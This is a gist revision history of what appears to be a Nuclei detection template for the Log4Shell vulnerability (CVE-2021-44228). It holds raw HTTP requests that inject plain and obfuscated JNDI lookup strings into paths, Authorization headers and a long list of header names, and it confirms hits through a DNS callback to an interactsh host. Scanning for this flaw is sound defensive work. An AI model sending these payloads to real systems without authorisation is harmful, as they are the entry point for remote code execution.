-
-
Save 0x254/1c7b6f2adf5aed6c9904ea6b73971701 to your computer and use it in GitHub Desktop.
Revisions
-
hazcod revised this gist
Dec 14, 2021 . 1 changed file with 10 additions and 10 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -9,7 +9,7 @@ info: requests: - raw: - | GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: @@ -20,7 +20,7 @@ requests: - raw: - | GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: @@ -31,7 +31,7 @@ requests: - raw: - | GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: @@ -42,7 +42,7 @@ requests: - raw: - | GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: @@ -54,7 +54,7 @@ requests: - raw: - | GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: @@ -67,7 +67,7 @@ requests: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o payloads: auth_type: @@ -86,7 +86,7 @@ requests: - | GET //{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o payloads: auth_type: @@ -105,7 +105,7 @@ requests: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o payloads: auth_type: @@ -128,7 +128,7 @@ requests: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o payloads: header_val: @@ -246,7 +246,7 @@ requests: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} §header_val§: ${jndi:dns://{{interactsh-url}}:80/o payloads: header_val: -
Dec 14, 2021 . No changes.There are no files selected for viewing
-
Dec 14, 2021 . 1 changed file with 178 additions and 41 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -13,47 +13,55 @@ requests: Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" # TODO maybe encoding - raw: - | GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | @@ -69,14 +77,29 @@ requests: - Basic matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | GET //{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o} payloads: auth_type: - Bearer - Oauth - Token - Basic matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | @@ -213,11 +236,125 @@ requests: matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - raw: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} §header_val§: ${jndi:dns://{{interactsh-url}}:80/o} payloads: header_val: - Accept - Accept-Charset - Accept-Datetime - Accept-Encoding - Accept-Language - Alt-Svc - Base-Url - CF-Connecting-IP - Cache-Control - Client-IP - Cluster - Cluster-Client-IP - Connection - Contact - Content-Length - Content-MD5 - Content-Type - Cookie - DNT - Date - Destination - Expect - Forwarded - From - Front-End-Https - HTTP_CLIENT_IP - HTTP_FORWARDED - HTTP_FORWARDED_FOR - HTTP_X_FORWARDED - HTTP_X_FORWARDED_FOR - Host - Http-Url - If-Match - If-Modified-Since - If-None-Match - If-Range - If-Unmodified-Since - Link - Location - Max-Forwards - Origin - Pragma - Profile - Proxy - Proxy-Authorization - Proxy-Connection - Proxy-Host - Proxy-Url - Range - Real-IP - Redirect - Referer - Referrer - Refferer - Request-Uri - TE - True-Client-IP - UID - Upgrade - Uri - User-Agent - Via - Warning - X-ATT-DeviceId - X-Arbitrary - X-CSRFToken - X-Client-IP - X-Cluster-Client-IP - X-Correlation-ID - X-Csrf-Token - X-Do-Not-Track - X-Forward-For - X-Forwarded - X-Forwarded-By - X-Forwarded-For - X-Forwarded-For-IP - X-Forwarded-For-Original - X-Forwarded-Host - X-Forwarded-Proto - X-Forwarded-Server - X-Forwarder-For - X-Host - X-Http-Destinationurl - X-Http-Host-Override - X-Http-Method-Override - X-Original-Remote-Addr - X-Original-Url - X-Originating-IP - X-Proxy-Url - X-ProxyUser-IP - X-Real-IP - X-Remote-Addr - X-Remote-IP - X-Request-ID - X-Requested-With - X-Rewrite-Url - X-True-IP - X-UIDH - X-Wap-Profile - X-XSRF-TOKEN attack: clusterbomb matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" -
Dec 13, 2021 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -9,7 +9,7 @@ info: requests: - raw: - | GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: -
Dec 11, 2021 . 1 changed file with 44 additions and 6 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,14 +2,29 @@ id: CVE-2021-44228 info: name: Log4J RCE author: iNvist / hazcod severity: critical description: CVE-2021-44228 requests: - raw: - | GET /{{Path}}${lower:jndi:dns://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - "JRMP" - raw: - | GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: @@ -26,7 +41,7 @@ requests: - raw: - | GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or @@ -44,7 +59,7 @@ requests: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o} payloads: auth_type: @@ -67,7 +82,30 @@ requests: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o} payloads: auth_type: - Bearer - Oauth - Token - Basic matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - "JRMP" - raw: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o} payloads: header_val: @@ -182,4 +220,4 @@ requests: - type: regex part: interactsh_request regex: - "JRMP" -
Dec 10, 2021 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Dec 10, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,185 @@ id: CVE-2021-44228 info: name: Log4J RCE author: iNvist severity: critical description: CVE-2021-44228 requests: - raw: - | GET /{{Path}}${jndi:rmi://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - "JRMP" # TODO maybe encoding - raw: - | GET /{{Path}}?${jndi:rmi://{{interactsh-url}}:80/d} HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - "JRMP" - raw: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} Authorization: {{auth_type }} ${jndi:rmi://{{interactsh-url}}:80/o} payloads: auth_type: - Bearer - Oauth - Token - Basic matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - "JRMP" - raw: - | GET /{{Path}} HTTP/1.1 Host: {{Hostname}} §header_val§: ${jndi:rmi://{{interactsh-url}}:80/o} payloads: header_val: - Accept - Accept-Charset - Accept-Datetime - Accept-Encoding - Accept-Language - Alt-Svc - Base-Url - CF-Connecting-IP - Cache-Control - Client-IP - Cluster - Cluster-Client-IP - Connection - Contact - Content-Length - Content-MD5 - Content-Type - Cookie - DNT - Date - Destination - Expect - Forwarded - From - Front-End-Https - HTTP_CLIENT_IP - HTTP_FORWARDED - HTTP_FORWARDED_FOR - HTTP_X_FORWARDED - HTTP_X_FORWARDED_FOR - Host - Http-Url - If-Match - If-Modified-Since - If-None-Match - If-Range - If-Unmodified-Since - Link - Location - Max-Forwards - Origin - Pragma - Profile - Proxy - Proxy-Authorization - Proxy-Connection - Proxy-Host - Proxy-Url - Range - Real-IP - Redirect - Referer - Referrer - Refferer - Request-Uri - TE - True-Client-IP - UID - Upgrade - Uri - User-Agent - Via - Warning - X-ATT-DeviceId - X-Arbitrary - X-CSRFToken - X-Client-IP - X-Cluster-Client-IP - X-Correlation-ID - X-Csrf-Token - X-Do-Not-Track - X-Forward-For - X-Forwarded - X-Forwarded-By - X-Forwarded-For - X-Forwarded-For-IP - X-Forwarded-For-Original - X-Forwarded-Host - X-Forwarded-Proto - X-Forwarded-Server - X-Forwarder-For - X-Host - X-Http-Destinationurl - X-Http-Host-Override - X-Http-Method-Override - X-Original-Remote-Addr - X-Original-Url - X-Originating-IP - X-Proxy-Url - X-ProxyUser-IP - X-Real-IP - X-Remote-Addr - X-Remote-IP - X-Request-ID - X-Requested-With - X-Rewrite-Url - X-True-IP - X-UIDH - X-Wap-Profile - X-XSRF-TOKEN attack: clusterbomb matchers-condition: or matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: regex part: interactsh_request regex: - "JRMP"